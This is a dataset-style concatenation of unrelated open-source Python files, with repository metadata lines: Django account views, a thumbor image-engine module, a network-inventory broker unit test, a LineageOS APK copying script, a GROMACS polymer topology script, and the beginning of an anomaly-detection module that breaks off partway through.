if __name__ == "__main__":
if len(sys.argv) == 1:
num = [int(i) for i in input('>>> Enter numbers to find N-th power with comma-separated: ').split(',')]
N = int(input('>>> Enter number for N: '))
print(index(array=num, n=N))
else:
        sys.exit(1)
accounts/views.py | Nuurek/HomeLibrary | 0 | 6616843 | from django.views.generic import TemplateView, FormView, RedirectView
from django.urls import reverse_lazy
from django.contrib.auth.models import User
from django.contrib.sites.shortcuts import get_current_site
from django.utils import timezone
from django.utils.crypto import get_random_string
from datetime import timedelta
from .forms import SignUpForm
from .models import UserProfile
from libraries.models import Library
class SignUpView(FormView):
template_name = 'accounts/signup.html'
form_class = SignUpForm
success_url = reverse_lazy('mail_sent')
def form_valid(self, form):
user: User = form.save(commit=False)
user.is_active = False
user.save()
user_profile = UserProfile(
user=user, confirmation_code=get_random_string(32), registration_time=timezone.now())
user_profile.save()
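        # Try to e-mail the confirmation link; undo the registration if sending fails.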
# noinspection PyBroadException
try:
domain = get_current_site(self.request)
user_profile.send_confirmation_code(domain=domain)
except Exception:
user.delete()
return super().form_valid(form)
class ConfirmationView(TemplateView):
template_name = 'accounts/confirmation.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
user_profile_id = kwargs['user_profile_id']
confirmation_code = kwargs['code']
user_profile = UserProfile.objects.get(id=user_profile_id)
if user_profile.confirmation_code == confirmation_code:
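            # Confirmation links are only honoured within 24 hours of registration.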
time_difference = timezone.now() - user_profile.registration_time
if time_difference < timedelta(hours=24):
user_profile.activate_user()
Library.objects.create(owner=user_profile).save()
context['success'] = True
context['username'] = user_profile.user.username
else:
user_profile.user.delete()
context['success'] = False
else:
context['success'] = False
        return context
opencv_engine/__init__.py | henriquesobral/opencv-engine | 0 | 6616844 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
__project__ = 'opencv_engine'
__version__ = None # required for initial installation
try:
__version__ = get_distribution(__project__).version
except DistributionNotFound:
VERSION = __project__ + '-' + '(local)'
else:
VERSION = __project__ + '-' + __version__
import logging
from pexif import ExifSegment
from thumbor.engines import BaseEngine
logger = logging.getLogger(__name__)
try:
from opencv_engine.engine_cv3 import Engine # NOQA
except ImportError:
logging.exception('Could not import opencv_engine. Probably due to setup.py installing it.')
def _patch_mime_types():
# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs
# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor
old_mime = BaseEngine.get_mimetype
def new_mime(buffer):
''' determine the mime type from the raw image data
Args:
buffer - raw image data
Returns:
mime - mime type of image
'''
mime = old_mime(buffer)
# tif files start with 'II'
if not mime and buffer.startswith('II'):
mime = 'image/tiff'
return mime
BaseEngine.get_mimetype = staticmethod(new_mime)
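# Patch EXIF-segment parsing as well, so images without EXIF data don't break reorientation.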
def _patch_exif():
def _get_exif_segment(self):
""" Override because the superclass doesn't check for no exif.
"""
segment = None
try:
if getattr(self, 'exif', None) is not None:
segment = ExifSegment(None, None, self.exif, 'ro')
except Exception:
logger.warning('Ignored error handling exif for reorientation', exc_info=True)
return segment
BaseEngine._get_exif_segment = _get_exif_segment
_patch_exif()
_patch_mime_types()
| <filename>opencv_engine/__init__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
__project__ = 'opencv_engine'
__version__ = None # required for initial installation
try:
__version__ = get_distribution(__project__).version
except DistributionNotFound:
VERSION = __project__ + '-' + '(local)'
else:
VERSION = __project__ + '-' + __version__
import logging
from pexif import ExifSegment
from thumbor.engines import BaseEngine
logger = logging.getLogger(__name__)
try:
from opencv_engine.engine_cv3 import Engine # NOQA
except ImportError:
logging.exception('Could not import opencv_engine. Probably due to setup.py installing it.')
def _patch_mime_types():
# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs
# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor
old_mime = BaseEngine.get_mimetype
def new_mime(buffer):
''' determine the mime type from the raw image data
Args:
buffer - raw image data
Returns:
mime - mime type of image
'''
mime = old_mime(buffer)
# tif files start with 'II'
if not mime and buffer.startswith('II'):
mime = 'image/tiff'
return mime
BaseEngine.get_mimetype = staticmethod(new_mime)
def _patch_exif():
def _get_exif_segment(self):
""" Override because the superclass doesn't check for no exif.
"""
segment = None
try:
if getattr(self, 'exif', None) is not None:
segment = ExifSegment(None, None, self.exif, 'ro')
except Exception:
logger.warning('Ignored error handling exif for reorientation', exc_info=True)
return segment
BaseEngine._get_exif_segment = _get_exif_segment
_patch_exif()
_patch_mime_types()
| en | 0.838532 | #!/usr/bin/env python # -*- coding: utf-8 -*- # required for initial installation # NOQA # need to monkey patch the BaseEngine.get_mimetype function to handle tiffs # has to be patched this way b/c called as both a classmethod and instance method internally in thumbor determine the mime type from the raw image data Args: buffer - raw image data Returns: mime - mime type of image # tif files start with 'II' Override because the superclass doesn't check for no exif. | 2.079558 | 2 |
tests/broker/test_add_aquilon_host.py | ned21/aquilon | 7 | 6616845 | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the add host command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from eventstest import EventsTestMixin
from brokertest import TestBrokerCommand
from dnstest import inaddr_ptr
# TODO: this file should be merged into test_add_host.py
class TestAddAquilonHost(EventsTestMixin, TestBrokerCommand):
def test_100_add_unittest00(self):
ip = self.net["unknown0"].usable[2]
self.dsdb_expect_add("unittest00.one-nyp.ms.com", ip, "eth0", ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest00.one-nyp.ms.com", "--ip", ip,
"--machine", "ut3c1n3", "--domain", "unittest",
"--personality", "inventory", "--buildstatus", "blind"])
self.dsdb_verify()
def test_105_show_unittest00(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest00.one-nyp.ms.com [%s]" %
self.net["unknown0"].usable[2],
command)
self.matchoutput(out, "Machine: ut3c1n3", command)
self.matchoutput(out, "Model Type: blade", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
self.matchoutput(out, "Advertise Status: False", command)
self.matchoutput(out, "Build Status: blind", command)
def test_105_show_unittest00_proto(self):
command = ["show", "host", "--hostname=unittest00.one-nyp.ms.com",
"--format=proto"]
host = self.protobuftest(command, expect=1)[0]
self.assertEqual(host.hostname, 'unittest00')
self.assertEqual(host.personality.name, 'inventory')
self.assertEqual(host.personality.archetype.name, 'aquilon')
self.assertEqual(host.fqdn, 'unittest00.one-nyp.ms.com')
self.assertEqual(host.mac, self.net["unknown0"].usable[2].mac)
self.assertEqual(host.ip, str(self.net["unknown0"].usable[2]))
self.assertEqual(host.archetype.name, 'aquilon')
self.assertEqual(host.dns_domain, 'one-nyp.ms.com')
self.assertEqual(host.domain.name, 'unittest')
self.assertEqual(host.domain.type, host.domain.DOMAIN)
self.assertEqual(host.sandbox_author, "")
self.assertEqual(host.status, 'blind')
self.assertEqual(host.machine.name, 'ut3c1n3')
self.assertEqual(host.sysloc, 'ut.ny.na')
self.assertEqual(host.type, 'host')
self.assertEqual(len(host.resources), 0)
self.assertEqual(len(host.services_used), 0)
self.assertEqual(len(host.services_provided), 0)
self.assertEqual(host.operating_system.archetype.name, 'aquilon')
self.assertEqual(host.operating_system.name,
self.config.get("archetype_aquilon",
"default_osname"))
self.assertEqual(host.operating_system.version,
self.config.get("archetype_aquilon",
"default_osversion"))
self.assertEqual(host.cluster, "")
def test_110_add_unittest12(self):
ip = self.net["unknown0"].usable[7]
self.dsdb_expect_add("unittest12.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest12.aqd-unittest.ms.com",
"--ip", ip, "--buildstatus", "blind",
"--machine", "ut3s01p1", "--domain", "unittest"])
self.dsdb_verify()
def test_115_show_unittest12(self):
command = "show host --hostname unittest12.aqd-unittest.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest12.aqd-unittest.ms.com [%s]" %
self.net["unknown0"].usable[7],
command)
self.matchoutput(out, "Machine: ut3s01p1", command)
self.matchoutput(out, "Model Type: rackmount", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
def test_130_add_unittest20_bad_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", "eth0,eth2",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "Machine unittest20.aqd-unittest.ms.com does not "
"have an interface named eth2.", command)
def test_130_add_unittest20_no_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", ",",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "The interface list cannot be empty.", command)
def test_131_add_unittest20_e1(self):
# Add the transit before the host to verify that the reverse DNS entry
# will get fixed up
ip = self.net["zebra_eth1"].usable[0]
fqdn = "unittest20-e1.aqd-unittest.ms.com"
self.dsdb_expect_delete(ip)
self.dsdb_expect_add(fqdn, ip, "eth1", ip.mac)
command = ["add", "interface", "address", "--machine", "ut3c5n2",
"--interface", "eth1", "--fqdn", fqdn]
self.noouttest(command)
self.dsdb_verify()
def test_132_add_unittest20_good(self):
ip = self.net["zebra_vip"].usable[2]
eth1_ip = self.net["zebra_eth1"].usable[0]
fqdn = 'unittest20.aqd-unittest.ms.com'
eth1_fqdn = 'unittest20-e1.aqd-unittest.ms.com'
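        # Zebra setup: the VIP is a service address shared across eth0 and eth1.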
self.event_add_dns(
fqdn=[
fqdn,
inaddr_ptr(ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.event_upd_dns(
fqdn=[
eth1_fqdn,
inaddr_ptr(eth1_ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(eth1_ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.dsdb_expect_add(fqdn, ip, "vip")
self.dsdb_expect_delete(eth1_ip)
self.dsdb_expect_add(eth1_fqdn, eth1_ip, "eth1",
eth1_ip.mac, primary=fqdn)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", fqdn,
"--ip", ip, "--zebra_interfaces", "eth0,eth1",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
self.events_verify()
def test_135_show_unittest20(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.searchoutput(out, r"Interface: eth0 %s \[boot, default_route\]" %
eth0_ip.mac, command)
self.searchoutput(out, r"Interface: eth1 %s \[default_route\]" %
eth1_ip.mac, command)
self.searchoutput(out,
r"Service Address: hostname\s*"
r"Address: unittest20.aqd-unittest.ms.com \[%s\]\s*"
r"Interfaces: eth0, eth1" % ip,
command)
self.matchoutput(out,
"Provides: unittest20-e1.aqd-unittest.ms.com [%s]" % eth1_ip,
command)
def test_135_show_unittest20_proto(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com", "--format", "proto"]
host = self.protobuftest(command, expect=1)[0]
found = False
for resource in host.resources:
if resource.name == "hostname" and resource.type == "service_address":
found = True
self.assertEqual(resource.service_address.ip, str(ip))
self.assertEqual(resource.service_address.fqdn,
"unittest20.aqd-unittest.ms.com")
ifaces = ",".join(sorted(resource.service_address.interfaces))
self.assertEqual(ifaces, "eth0,eth1")
self.assertTrue(found,
"Service address hostname not found in the resources. "
"Existing resources: %s" %
", ".join("%s %s" % (res.type, res.name)
for res in host.resources))
def test_135_verify_unittest20_service(self):
ip = self.net["zebra_vip"].usable[2]
command = ["show", "service", "address", "--name", "hostname",
"--hostname", "unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "Service Address: hostname", command)
self.matchoutput(out, "Bound to: Host unittest20.aqd-unittest.ms.com",
command)
self.matchoutput(out, "Address: unittest20.aqd-unittest.ms.com [%s]" % ip,
command)
self.matchoutput(out, "Interfaces: eth0, eth1", command)
def test_135_verify_unittest20_e1(self):
command = ["show", "address",
"--fqdn", "unittest20-e1.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "DNS Record: unittest20-e1.aqd-unittest.ms.com",
command)
self.matchoutput(out, "IP: %s" % self.net["zebra_eth1"].usable[0],
command)
self.matchoutput(out, "Reverse PTR: unittest20.aqd-unittest.ms.com",
command)
def test_140_add_unittest21(self):
ip = self.net["zebra_eth0"].usable[1]
self.dsdb_expect_add("unittest21.aqd-unittest.ms.com", ip, "bond0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest21.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n3",
"--domain", "unittest",
"--personality", "compileserver",
"--grn", "grn:/ms/ei/aquilon/unittest"])
self.dsdb_verify()
def test_145_verify_unittest21_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[1]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
macs = [ip.mac] # , self.net["zebra_eth1"].usable[1].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_150_add_unittest22(self):
ip = self.net["zebra_eth0"].usable[2]
self.dsdb_expect_add("unittest22.aqd-unittest.ms.com", ip, "br0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest22.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n4",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_155_verify_unittest22_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[2]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
macs = [ip.mac] # , self.net["zebra_eth1"].usable[2].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_160_add_unittest23(self):
ip = self.net["vpls"].usable[1]
self.dsdb_expect_add("unittest23.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest23.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_161_add_unittest24(self):
ip = self.net["vpls"].usable[2]
self.dsdb_expect_add("unittest24.one-nyp.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest24.one-nyp.ms.com",
"--ip", ip, "--machine", "np3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_162_add_unittest25(self):
ip = self.net["unknown0"].usable[20]
self.dsdb_expect_add("unittest25.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest25.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n7",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_163_add_unittest26(self):
ip = self.net["unknown0"].usable[23]
self.dsdb_expect_add("unittest26.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest26.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n8",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestAddAquilonHost)
    unittest.TextTestRunner(verbosity=2).run(suite)
copy_files.py | tprasadtp/lineageos-apk-extractor | 8 | 6616846 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copy files from /mnt/lineage
to releases folder and rename them according to tag.
Must be executed after ./los_extractor.py
This does not mount/extract the image.
Use scripts/extract.sh
Uses a json file to map filenames to paths.
"""
# Standard Library Imports
import argparse
import json
import logging
import os
from pathlib import Path
import platform
import shutil
import sys
# Internal imports from project
from utils import get_file as dl
from utils import get_log_level, set_logger, write_json
MOUNT_POINT = "/mnt/lineage/"
RELEASE_DIR = Path("releases")
METADATA_DIR = Path("metadata")
DEVICE_NAME = os.environ.get("LOS_DEVICE_CODENAME", "bullhead")
RELEASE_NOTES = "metadata/Release-Notes.md"
# if os.environ.get('TRAVIS') == "true" or os.environ.get('CI') == "true":
# print("Running on TRAVIS or other CI.")
# TRANSFER_JSON = "transfer.json"
TRANSFER_JSON = "data/transfer.json"
# else:
# TRANSFER_JSON = "test_transfer.json"
# Logs
# create logger
log = set_logger()
def define_tag_from_json(release_json):
"""
Read release.json to set TAG variable
"""
log.debug("Setting TAG Variable")
if os.path.isfile(release_json):
try:
log.info("Reading json data from file.")
with open(release_json) as r:
jsondata = json.loads(r.read())
global TAG
TAG = jsondata["release"]["tag"]
if str(TAG) == "":
log.critical("TAG is empty!.")
sys.exit(10)
except Exception as e:
log.critical("Failed to read from %s", release_json)
log.exception(e)
sys.exit(1)
else:
log.critical("%s is not found on the FS", release_json)
sys.exit(1)
def copy_release_files(mount_point, transfer_json):
""""
Checks if mount point is available. If true,
Copies APKS and other release assets to ./releases folder
"""
log.info("Checking Mount point")
if os.path.ismount(mount_point) or os.path.isdir(mount_point):
if Path(RELEASE_DIR).exists():
log.debug("%s folder is already present. deleting it..", RELEASE_DIR)
try:
shutil.rmtree(RELEASE_DIR)
except Exception:
log.critical("Failed to delete already existing %s", RELEASE_DIR)
sys.exit(1)
try:
log.debug("Creating releases folder")
os.makedirs(RELEASE_DIR)
except Exception as e:
log.critical("Failed to create %s directory.", RELEASE_DIR)
log.exception(e)
sys.exit(1)
if os.path.isfile(transfer_json):
with open(transfer_json) as t:
transfer = json.loads(t.read())
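                # transfer.json maps an output name to a source path inside
                # the mounted image; a hypothetical entry:
                #   {"Jelly": "/mnt/lineage/system/app/Jelly/Jelly.apk"}
                # Each file is copied as <app>-<TAG><original extension>.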
for app, path in transfer.items():
fname = app + "-" + TAG + os.path.splitext(path)[1]
try:
log.info("Copying %s from %s", app, path)
shutil.copy2(path, RELEASE_DIR / fname)
except Exception as e:
log.error("Failed to Copy %s", app)
log.exception(e)
else:
log.critical(
"%s is not present. Cannot determine file list.", transfer_json
)
sys.exit(1)
def copy_metadata_files():
log.info("Copying Metadata")
try:
log.info("Copying README.md")
shutil.copy2("README.md", METADATA_DIR / "README.md")
except Exception as e:
log.critical("Failed to copy Readme.md")
log.exception(e)
sys.exit(1)
def main(device, transfer_json, test_mode):
"""
Main
"""
release_josn = f"metadata/release-{device}.json"
if test_mode:
log.warn("Test mode is active")
mount_point = "test/"
else:
mount_point = MOUNT_POINT
define_tag_from_json(release_josn)
copy_metadata_files()
copy_release_files(mount_point, transfer_json)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
add_help=True,
)
parser.add_argument(
"-d", "--device", required=True, type=str, help="Device Codename"
)
parser.add_argument(
"-l", "--list", required=True, type=str, help="Json list mapping"
)
parser.add_argument(
"-q",
"--quiet",
action="count",
help="Decrease output verbosity \
Default level is INFO",
)
parser.add_argument(
"-t",
"--test-mode",
required=False,
action="store_true",
help="Use Test Mode without mounting img",
)
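    # Example invocation (hypothetical; assumes the image was already
    # mounted by scripts/extract.sh):
    #   python copy_files.py --device bullhead --list data/transfer.json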
args = parser.parse_args()
log.setLevel(get_log_level(args.quiet))
main(args.device, args.list, args.test_mode)
| en | 0.7067 | #!/usr/bin/env python # -*- coding: utf-8 -*- Copy files from /mnt/lineage to releases folder and rename them according to tag. Must be executed after ./los_extractor.py This does not mount/extract the image. Use scripts/extract.sh Uses a json file to map filenames to paths. # Standard Library Imports # Internal imports from project # if os.environ.get('TRAVIS') == "true" or os.environ.get('CI') == "true": # print("Running on TRAVIS or other CI.") # TRANSFER_JSON = "transfer.json" # else: # TRANSFER_JSON = "test_transfer.json" # Logs # create logger Read release.json to set TAG variable Checks if the mount point is available. If true, copies APKs and other release assets to the ./releases folder. Main | 2.673667 | 3 |
polymer_force_field/add_monomer.py | UWPRG/Nance_Enzyme_Encap_MD | 1 | 6616847 |
import os.path as op
from io import StringIO
import pandas as pd
data_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/PEG_chain/ffmaker_PEG')
ff_dir = op.join(op.dirname(__file__), '/suppscr/pfaendtner/cnyambura/NEE_home/BSA_Nano_Prep/polymer_force_field/conf_data/MOD_n_amber99sb-ildn.ff/')
# give file names for topology and force field
polymer_topology = op.join(data_dir, 'PEG_GMX.top')
force_field_nonbonded = op.join(ff_dir, 'ffnonbonded.itp')
force_field_bonded = op.join(ff_dir, 'ffbonded.itp')
cap2 = {'name': 'tPEG',
'list': ['O3','C5','H10','H11','C6','H12','H13','O4','H14']
}
monomer = {'name': 'PEG',
'list': ['O2','C3','H6','H7','C4','H8','H9']
}
cap0 = {'name': 'sPEG',
'list': ['H1','O1','C1','H2','H3','C2','H4','H5']
}
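# The chain is split into a starting cap (sPEG), the repeating monomer (PEG)
# and a terminating cap (tPEG); the atom-name lists above decide which of
# these residues each topology atom is reassigned to below.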
# read file into string for parsing
def parse_topology(filename, section, header):
top_string = ''
with open(filename) as top_file:
for line in top_file:
top_string += line
# process section string for conversion to dataframe
section_string = top_string.split(section)[1].split('\n\n')[0]
pandas_readable = StringIO(section_string)
# create section DataFrame
    section_df = pd.read_table(pandas_readable, sep=r'\s+',
                               comment=';', names=header)
return section_df
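# parse_topology() expects GROMACS-style sections: a "[ name ]" header line,
# whitespace-separated columns, ";" comments, and a blank line terminating
# the section. A hypothetical fragment of the kind it parses:
#   [ atoms ]
#   ;  nr  type  resi  res  atom  cgnr   charge    mass
#      1    oh     1   PEG    O1     1  -0.6000  16.000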
# define headers for sections of interest
atoms_header = ['nr', 'type', 'resi', 'res',
'atom', 'cgnr', 'charge', 'mass']
atom_types_header = ['name', 'bond_type', 'mass', 'charge',
'ptype', 'sigma', 'epsilon']
bonds_header = ['ai', 'aj', 'funct', 'r', 'k']
# get polymer topology DataFrames
atoms = parse_topology(polymer_topology, '[ atoms ]', atoms_header)
bonds = parse_topology(polymer_topology, '[ bonds ]', bonds_header)
atom_types = parse_topology(polymer_topology, '[ atomtypes ]',
                            atom_types_header)
for index, row in atoms.iterrows():
if row['atom'] in monomer['list']:
atoms.loc[index, 'restype'] = monomer['name']
elif row['atom'] in cap0['list']:
atoms.loc[index, 'restype'] = cap0['name']
elif row['atom'] in cap2['list']:
atoms.loc[index, 'restype'] = cap2['name']
# get force field topology DataFrames
ff_bonds = parse_topology(force_field_bonded, '[ bondtypes ]',
bonds_header)
ff_atom_types = parse_topology(force_field_nonbonded, '[ atomtypes ]',
atom_types_header)
for index, row in atom_types.iterrows():
# attempt to assign atom type based on LJ parameters
    candidates = ff_atom_types.loc[
        (ff_atom_types['sigma'] == row['sigma'])
        & (ff_atom_types['epsilon'] == row['epsilon'])]
# holler if there are no matches!
if candidates.empty:
        print('Oops! Could not find match for atom type {} in '
              'this force field! Add this atom manually.'.format(row['name']))
continue
    # assign atom type if there is only one match
if len(candidates) == 1:
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = candidates['name'].values[0]
continue
atom_number = atoms[atoms['type'] == row['name']]['nr'].values[0]
atom_names = str(
atoms[atoms['type'] == row['name']]['atom'].values
).replace('[', '').replace(']', '')
    bond_check = bonds.loc[
        (bonds['ai'] == atom_number)
        | (bonds['aj'] == atom_number)]
    bond_candidates = ff_bonds.loc[
        (ff_bonds['r'] == bond_check['r'].values[0])
        & (ff_bonds['k'] == bond_check['k'].values[0])]
if bond_candidates.empty:
print("Found several candidate atomtypes based "
"on LJ paramters, but no perfect bond mathches.\n")
# quick last ditch assignment based on name
if row['name'].upper() in candidates['name'].values:
print("Approximate name match found. Would you like "
"to assign atomtype '{}' from the force field "
"to your atom(s) {}?".format(
row['name'].upper(), atom_names))
choice = input("(y/n): ")
if choice == 'y':
atoms.loc[atoms['type'] == row['name'], 'ff_name'] = row['name'].upper()
continue
print("Here is a list of other candidates.")
print("Please choose an atom name for '{}' "
"from the following list:".format(row['name']))
for idx, name in enumerate(candidates['name'].values):
print('{}. {}'.format(idx, name))
selection = int(input('number: '))
    # assign into atoms like the other branches so the choice reaches the
    # residue-formatting loop below (which reads 'ff_name' from atoms)
    atoms.loc[atoms['type'] == row['name'], 'ff_name'] = candidates['name'].values[selection]
# Alright.... let's say we've got atom types correctly assigned by this point.
# We'll have to do some manual editing, but we're close enough for government
# work. Now to format these things in the correct group.
for new_residue in atoms['restype'].unique():
res_df = atoms.loc[atoms['restype'] == new_residue, :]
header = '[ {} ]\n [ atoms ]\n'.format(new_residue)
res_string = [header]
for index, row in res_df.iterrows():
start_index = res_df.index[0]
name = row['atom']
ff_type = row['ff_name']
charge = row['charge']
id = row['nr'] - start_index
row_string = f"{name:>6} {ff_type:<3}{charge:17.5f} {id:5}\n"
res_string.append(row_string)
res_string.append(' [ bonds ]\n')
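    # Bonds that cross a residue boundary follow the GROMACS .rtp convention:
    # a "+" prefix marks the partner atom in the next residue and a "-"
    # prefix the previous one, as handled by the two elif branches below.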
for index, row in bonds.iterrows():
atom1 = atoms.loc[atoms['nr'] == row['ai'], 'atom'].values[0]
atom2 = atoms.loc[atoms['nr'] == row['aj'], 'atom'].values[0]
if (atom1 in res_df['atom'].values) \
& (atom2 in res_df['atom'].values):
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom1 in res_df['atom'].values:
atom2 = '+' + atom2
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
elif atom2 in res_df['atom'].values:
atom1 = '-' + atom1
row_string = f'{atom1:>6} {atom2:>5}\n'
res_string.append(row_string)
res_top = ''.join(res_string)
outfile = "{}_top.itp".format(new_residue)
full_out_path = op.join(data_dir, outfile)
with open(full_out_path, "w") as text_file:
print(res_top, file=text_file)
| en | 0.866329 | # give file names for topology and force field # read file into string for parsing # process section string for conversion to dataframe # create section DataFrame # define headers for sections of interest # get polymer topology DataFrames # get force field topology DataFrames # attempt to assign atom type based on LJ parameters # holler if there are no matches! # assign atom type if there is only one match # quick last ditch assignment based on name # Alright.... let's say we've got atom types correctly assigned by this point. # We'll have to do some manual editing, but we're close enough for government # work. Now to format these things in the correct group. | 2.367573 | 2 |
anomaly.py | bitbloop/Anomaly | 0 | 6616848 |
import numpy as np
import matplotlib.pyplot as plt
#################
# DATA PROCESSING FUNCTIONS
# Linearly rescale each column. Note rng is half the column range, so with
# the defaults (high=1.0, low=0.0) each column ends up spanning [-1, 1]:
# the column max maps to high and the column min to 2*low - high.
def scale_linear_by_column(rawpoints, high=1.0, low=0.0):
mins = np.min(rawpoints, axis=0)
maxs = np.max(rawpoints, axis=0)
rng = (maxs - mins)*0.5
return high - (((high - low) * (maxs - rawpoints)) / rng)
# Normalize and shift the data
def preprocess_data(x):
#normalize the data
x=scale_linear_by_column(x) # np.linalg.norm(x, axis=0)
# shift the data
x=x-np.mean(x, axis=0)
return x
#################
# KERNEL FUNCTIONS
# Gaussian
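# Per-feature (diagonal-covariance) density:
#   p(x) = prod_j 1/(sqrt(2*pi)*sigma_j) * exp(-(x_j - u_j)^2 / (2*sigma_j^2))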
def probability(x, u, sigma2):
sigma=np.sqrt(sigma2)
p=np.divide(1, np.sqrt(2*np.pi)*sigma, out=np.zeros_like(sigma), where=sigma!=0)
p=p*np.exp(-np.divide(np.square(x-u), 2*sigma2))
return np.prod(p, axis=1)
# Multivariate Gaussian
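# Full-covariance density:
#   p(x) = exp(-0.5 * (x-u)^T E^-1 (x-u)) / ((2*pi)^(n/2) * sqrt(det(E)))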
def probability_multivariate(x, u, E):
    n = x[0, :].size
    diff = x - u
    # quadratic form (x-u)^T E^-1 (x-u), one scalar per example
